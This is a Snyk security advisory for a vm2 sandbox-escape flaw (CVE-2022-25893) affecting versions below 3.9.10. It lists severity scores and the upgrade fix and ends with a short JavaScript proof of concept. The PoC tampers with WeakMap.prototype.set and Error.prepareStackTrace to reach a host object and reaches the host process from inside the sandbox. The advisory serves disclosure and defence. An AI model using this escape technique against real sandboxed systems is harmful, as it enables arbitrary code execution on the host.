<p>Upgrade <code>vm2</code> to version 3.9.10 or higher.</p>

Arbitrary Code Execution Affecting vm2 package, versions <3.9.10

Snyk CVSS

Attack Complexity Low

Confidentiality High

Integrity High

Availability High

Threat Intelligence

Exploit Maturity Proof of concept

EPSS 0.18% (55^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-JS-VM2-2990237
published 20 Dec 2022
disclosed 24 Aug 2022
credit Ghaem Arasteh

Report a new vulnerability Found a mistake?

Introduced: 24 Aug 2022

CVE-2022-25893 Open this link in a new tab CWE-94 Open this link in a new tab First added by Snyk

How to fix?

Upgrade vm2 to version 3.9.10 or higher.

Overview

vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.

Affected versions of this package are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the WeakMap.prototype.set method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.

PoC

const { VM } = require('vm2');
new VM().run(`
const { set } = WeakMap.prototype;
WeakMap.prototype.set = function(v) {
return set.call(this, v, v);
};
Error.prepareStackTrace =
Error.prepareStackTrace =
(_, c) => c.map(c => c.getThis()).find(a => a);
const { stack } = new Error();
Error.prepareStackTrace = undefined;
stack.process.exit(1);
`);

// Never gets executed.
console.log('Finished');